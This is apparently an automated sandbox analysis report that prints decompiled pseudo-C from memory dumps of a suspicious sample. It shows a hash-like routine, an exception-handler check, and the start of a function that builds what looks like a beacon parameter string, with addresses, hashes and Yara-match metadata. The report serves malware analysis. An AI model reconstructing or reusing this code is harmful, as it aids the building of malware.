                				_t338 = _t607 ^ _t422;
                				asm("ror ecx, 0x9");
                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                				asm("rol eax, 0x4");
                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                				asm("rol esi, 0xb");
                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                				asm("rol edi, 0x10");
                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                				_t424 = _t734 ^ _t613;
                				asm("ror ecx, 0x9");
                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                				asm("rol eax, 0x4");
                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                				asm("rol edx, 0xb");
                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                				asm("rol esi, 0x10");
                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                				asm("ror ecx, 0x9");
                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                				asm("rol eax, 0x6");
                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                				asm("rol edx, 0xa");
                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                				asm("rol esi, 0xf");
                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                				asm("ror ecx, 0xb");
                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                				asm("rol eax, 0x6");
                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                				asm("rol edx, 0xa");
                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                				asm("rol esi, 0xf");
                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                				asm("ror ecx, 0xb");
                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                				asm("rol eax, 0x6");
                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                				asm("rol edx, 0xa");
                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                				asm("rol esi, 0xf");
                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                				asm("ror edi, 0xb");
                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                				asm("rol eax, 0x6");
                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                				asm("rol edx, 0xa");
                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                				_t400 = _a4;
                				asm("rol esi, 0xf");
                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                				 *_t400 =  *_t400 + _t259;
                				asm("ror eax, 0xb");
                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                				return memset( &_v76, 0, 0x40);
                			}
                0x022216e2
                0x022216ed
                0x022216f0
                0x022216f3
                0x022216f4
                0x02221712
                0x02221714
                0x02221717
                0x0222171a
                0x0222171a
                0x0222171d
                0x0222171d
                0x02221720
                0x02221720
                0x02221723
                0x02221723
                0x02221740
                0x02221743
                0x02221759
                0x0222175c
                0x02221776
                0x02221779
                0x0222178f
                0x02221792
                0x02221794
                0x022217ac
                0x022217af
                0x022217b2
                0x022217ca
                0x022217cd
                0x022217e7
                0x022217ea
                0x02221800
                0x02221803
                0x02221805
                0x0222181d
                0x02221822
                0x02221825
                0x0222183b
                0x0222183e
                0x02221858
                0x0222185b
                0x02221871
                0x02221874
                0x02221876
                0x02221891
                0x02221894
                0x022218ab
                0x022218ae
                0x022218b2
                0x022218cb
                0x022218ce
                0x022218d0
                0x022218d3
                0x022218ee
                0x022218f1
                0x0222190a
                0x0222190d
                0x0222191d
                0x02221920
                0x02221938
                0x0222193b
                0x02221955
                0x02221958
                0x02221970
                0x02221973
                0x02221989
                0x0222198c
                0x022219a4
                0x022219a7
                0x022219bf
                0x022219c2
                0x022219dc
                0x022219df
                0x022219f5
                0x022219f8
                0x02221a10
                0x02221a13
                0x02221a2d
                0x02221a30
                0x02221a48
                0x02221a4b
                0x02221a61
                0x02221a64
                0x02221a7c
                0x02221a7f
                0x02221a97
                0x02221a9a
                0x02221aac
                0x02221aaf
                0x02221ac1
                0x02221ac4
                0x02221ad6
                0x02221ad9
                0x02221add
                0x02221aed
                0x02221af0
                0x02221afe
                0x02221b01
                0x02221b13
                0x02221b16
                0x02221b2a
                0x02221b2d
                0x02221b2f
                0x02221b3f
                0x02221b42
                0x02221b54
                0x02221b57
                0x02221b65
                0x02221b68
                0x02221b7a
                0x02221b7d
                0x02221b81
                0x02221b91
                0x02221b94
                0x02221ba6
                0x02221ba9
                0x02221bb7
                0x02221bba
                0x02221bcc
                0x02221bcf
                0x02221be1
                0x02221be4
                0x02221bf8
                0x02221bfb
                0x02221c0f
                0x02221c12
                0x02221c26
                0x02221c29
                0x02221c3d
                0x02221c40
                0x02221c54
                0x02221c57
                0x02221c6b
                0x02221c70
                0x02221c82
                0x02221c85
                0x02221c99
                0x02221c9c
                0x02221cb0
                0x02221cb3
                0x02221cc9
                0x02221ccc
                0x02221ce0
                0x02221ce3
                0x02221cf5
                0x02221cf8
                0x02221d0c
                0x02221d0f
                0x02221d23
                0x02221d26
                0x02221d3a
                0x02221d43
                0x02221d46
                0x02221d4f
                0x02221d58
                0x02221d60
                0x02221d68
                0x02221d72
                0x02221d87

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
                • Instruction ID: 8de83e9921e012c76375883c3156189f67390b5df7c3f8de6ebba833ef174f61
                • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
                • Instruction Fuzzy Hash: 8822857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02228551(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x222a380; // 0x0
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x222a3c8 = 1;
                										__eflags =  *0x222a3c8;
                										if( *0x222a3c8 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x222a380; // 0x0
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x222a3c8 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x222a380 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x222a388 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x222a384 + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x222a388 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x222a388 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x222a3c8 = 1;
                							__eflags =  *0x222a3c8;
                							if( *0x222a3c8 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x222a388 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x222a388 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x222a3c8 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x222a388 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t25 = _t81 - 1; // -1
                							_t58 = _t25;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x222a380 = _t81;
                								}
                								_t28 = _t81 - 1; // 0x0
                								_t58 = _t28;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x222a388 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x222a388 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}
                0x0222855b
                0x0222855e
                0x02228564
                0x02228582
                0x00000000
                0x02228582
                0x0222856c
                0x02228575
                0x0222857b
                0x0222858a
                0x0222858d
                0x02228590
                0x0222859a
                0x0222859a
                0x0222859c
                0x0222859f
                0x022285a1
                0x022285a1
                0x022285a3
                0x022285a6
                0x00000000
                0x00000000
                0x022285a8
                0x022285aa
                0x02228610
                0x02228610
                0x0222876e
                0x00000000
                0x0222876e
                0x022285ac
                0x022285ac
                0x022285b0
                0x022285b2
                0x022285b2
                0x022285b2
                0x022285b2
                0x022285b5
                0x022285b6
                0x022285b9
                0x022285b9
                0x022285bd
                0x022285c1
                0x022285cf
                0x022285cf
                0x022285d7
                0x022285dd
                0x022285df
                0x022285e1
                0x022285f1
                0x022285fe
                0x02228602
                0x02228607
                0x02228609
                0x02228687
                0x02228687
                0x0222860b
                0x0222860b
                0x0222860b
                0x02228689
                0x0222868b
                0x0222876c
                0x0222876c
                0x00000000
                0x02228691
                0x02228691
                0x02228698
                0x00000000
                0x00000000
                0x0222869e
                0x022286a2
                0x022286fe
                0x02228700
                0x02228708
                0x0222870a
                0x0222870c
                0x00000000
                0x00000000
                0x0222870e
                0x02228714
                0x02228716
                0x02228718
                0x0222872d
                0x0222872d
                0x0222872f
                0x0222875e
                0x02228765
                0x00000000
                0x02228765
                0x02228733
                0x02228734
                0x02228736
                0x02228738
                0x02228738
                0x0222873a
                0x0222873c
                0x0222873e
                0x02228752
                0x02228752
                0x02228755
                0x02228757
                0x02228757
                0x02228758
                0x02228758
                0x00000000
                0x02228740
                0x02228740
                0x02228740
                0x02228749
                0x0222874a
                0x0222874c
                0x0222874e
                0x0222874e
                0x00000000
                0x02228740
                0x0222873e
                0x0222871a
                0x02228721
                0x02228721
                0x02228723
                0x00000000
                0x00000000
                0x02228725
                0x02228726
                0x02228729
                0x0222872b
                0x00000000
                0x00000000
                0x00000000
                0x0222872b
                0x00000000
                0x02228721
                0x022286a4
                0x022286a7
                0x022286ac
                0x00000000
                0x00000000
                0x022286b5
                0x022286b7
                0x022286bd
                0x00000000
                0x00000000
                0x022286c3
                0x022286c9
                0x00000000
                0x00000000
                0x022286cf
                0x022286d1
                0x022286da
                0x022286de
                0x00000000
                0x00000000
                0x022286e4
                0x022286e7
                0x022286e9
                0x00000000
                0x00000000
                0x022286f0
                0x022286f2
                0x00000000
                0x00000000
                0x022286f4
                0x022286f8
                0x00000000
                0x00000000
                0x00000000
                0x022286f8
                0x00000000
                0x00000000
                0x00000000
                0x022285e3
                0x022285e3
                0x022285e3
                0x022285ea
                0x00000000
                0x00000000
                0x022285ec
                0x022285ed
                0x022285ef
                0x00000000
                0x00000000
                0x00000000
                0x022285ef
                0x02228617
                0x02228619
                0x00000000
                0x00000000
                0x02228629
                0x0222862b
                0x0222862d
                0x00000000
                0x00000000
                0x02228633
                0x0222863a
                0x02228666
                0x02228666
                0x02228668
                0x0222866a
                0x0222867e
                0x02228680
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0222866c
                0x0222866c
                0x0222866c
                0x02228675
                0x02228676
                0x02228678
                0x0222867a
                0x0222867a
                0x00000000
                0x0222866c
                0x0222863c
                0x0222863c
                0x0222863f
                0x02228641
                0x02228653
                0x02228653
                0x02228656
                0x02228658
                0x02228658
                0x02228659
                0x02228659
                0x0222865f
                0x0222865f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x02228643
                0x02228643
                0x02228643
                0x0222864a
                0x00000000
                0x00000000
                0x0222864c
                0x0222864c
                0x0222864d
                0x00000000
                0x00000000
                0x00000000
                0x0222864d
                0x0222864f
                0x02228651
                0x02228664
                0x00000000
                0x00000000
                0x00000000
                0x02228664
                0x00000000
                0x02228651
                0x022285c3
                0x022285c6
                0x022285c9
                0x00000000
                0x00000000
                0x022285cb
                0x022285cd
                0x00000000
                0x00000000
                0x00000000
                0x022285cd
                0x02228592
                0x02228594
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02228602
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 53c98587ba963457f1ec09e170f42afcda0f55156e45263c2bcff768a45e85f6
                • Instruction ID: 5f3f3e2efa71cbf5557fb184a8743b5ff8b77137f8b7eab5367b75f2f966cddc
                • Opcode Fuzzy Hash: 53c98587ba963457f1ec09e170f42afcda0f55156e45263c2bcff768a45e85f6
                • Instruction Fuzzy Hash: 3961F634A20232BFDB29CEE8D58077933A6FB85354B258429D406CB69CE773D84DC672
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E0222832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E02228497(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E02228551(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E0222843C(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E02228497(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E02228533(_t82[2]);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])(1);
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}
                0x02228330
                0x02228331
                0x02228332
                0x02228335
                0x02228337
                0x0222833a
                0x0222833b
                0x0222833d
                0x0222833e
                0x0222833f
                0x02228342
                0x0222834c
                0x022283fd
                0x02228404
                0x0222840d
                0x02228352
                0x02228352
                0x02228358
                0x0222835e
                0x02228361
                0x02228364
                0x02228368
                0x0222836d
                0x02228372
                0x022283f2
                0x00000000
                0x02228374
                0x02228374
                0x02228380
                0x02228382
                0x022283dd
                0x022283dd
                0x022283e3
                0x00000000
                0x02228384
                0x02228393
                0x02228395
                0x02228396
                0x02228397
                0x0222839a
                0x0222839a
                0x0222839c
                0x00000000
                0x0222839e
                0x0222839e
                0x022283e8
                0x022283a0
                0x022283a0
                0x022283a4
                0x022283ac
                0x022283b1
                0x022283b6
                0x022283c2
                0x022283ca
                0x022283d1
                0x022283d7
                0x022283db
                0x00000000
                0x022283db
                0x0222839e
                0x0222839c
                0x00000000
                0x02228382
                0x022283f6
                0x022283f6
                0x022283f6
                0x02228372
                0x02228412
                0x02228419

                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction ID: 57275b4ae29193f91000f662cbf3fd0c8488a2fab8c317b692722d809040ffb9
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: FA21FB32910215AFCB10DFA8C8C09ABBBA5FF45350B468158E915DF249E731F919CBF1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Offset: 00716000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_716000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: a736bd7200e9029a8b18bd11bff088e9efcba74091d5cbad8fc51baf2039ce68
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 3A118E72341200AFD744DF59DC86FE673EAEB88320B298165ED08CB352E679EC45C761
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                • Instruction ID: cb338683bbbbb770a5ec9f26ce2a43e2f4ac44bafd8af397dcfe8ba9a35ecf79
                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                • Instruction Fuzzy Hash: B401A277A006048FDF21DF64C805BAF37E9FB86316F4544A5D90AA72C2E774A9818B90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E02222B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                				intOrPtr _v4;
                				signed int _v8;
                				int* _v12;
                				char* _v16;
                				intOrPtr _v20;
                				void* _v24;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				long _t68;
                				intOrPtr _t69;
                				intOrPtr _t70;
                				intOrPtr _t71;
                				intOrPtr _t72;
                				intOrPtr _t73;
                				void* _t76;
                				intOrPtr _t77;
                				int _t80;
                				intOrPtr _t81;
                				intOrPtr _t85;
                				intOrPtr _t86;
                				intOrPtr _t87;
                				void* _t89;
                				void* _t92;
                				intOrPtr _t96;
                				intOrPtr _t100;
                				intOrPtr* _t102;
                				int* _t108;
                				int* _t118;
                				char** _t120;
                				char* _t121;
                				intOrPtr* _t126;
                				intOrPtr* _t128;
                				intOrPtr* _t130;
                				intOrPtr* _t132;
                				intOrPtr _t135;
                				intOrPtr _t139;
                				int _t142;
                				intOrPtr _t144;
                				int _t147;
                				intOrPtr _t148;
                				int _t151;
                				void* _t152;
                				intOrPtr _t166;
                				void* _t168;
                				int _t169;
                				void* _t170;
                				void* _t171;
                				long _t172;
                				intOrPtr* _t173;
                				intOrPtr* _t174;
                				intOrPtr _t175;
                				intOrPtr* _t178;
                				char** _t181;
                				char** _t183;
                				char** _t184;
                				void* _t189;
                
                				_t68 = __eax;
                				_t181 =  &_v16;
                				_t152 = _a20;
                				_a20 = 8;
                				if(__eax == 0) {
                					_t68 = GetTickCount();
                				}
                				_t69 =  *0x222a018; // 0x258be91c
                				asm("bswap eax");
                				_t70 =  *0x222a014; // 0x3a87c8cd
                				asm("bswap eax");
                				_t71 =  *0x222a010; // 0xd8d2f808
                				asm("bswap eax");
                				_t72 = E0222A00C; // 0xeec43f25
                				asm("bswap eax");
                				_t73 =  *0x222a348; // 0x9ad5a8
                				_t3 = _t73 + 0x222b5ac; // 0x74666f73
                				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x222a02c,  *0x222a004, _t68);
                				_t76 = E0222467F();
                				_t77 =  *0x222a348; // 0x9ad5a8
                				_t4 = _t77 + 0x222b575; // 0x74707526
                				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
                				_t183 =  &(_t181[0xe]);
                				_t170 = _t169 + _t80;
                				if(_a24 != 0) {
                					_t148 =  *0x222a348; // 0x9ad5a8
                					_t8 = _t148 + 0x222b508; // 0x732526
                					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
                					_t183 =  &(_t183[3]);
                					_t170 = _t170 + _t151;
                				}
                				_t81 =  *0x222a348; // 0x9ad5a8
                				_t10 = _t81 + 0x222b89e; // 0x2bd8e46
                				_t153 = _t10;
                				_t189 = _a20 - _t10;
                				_t12 = _t81 + 0x222b246; // 0x74636126
                				_t164 = 0 | _t189 == 0x00000000;
                				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
                				_t85 =  *0x222a36c; // 0x2bd95b0
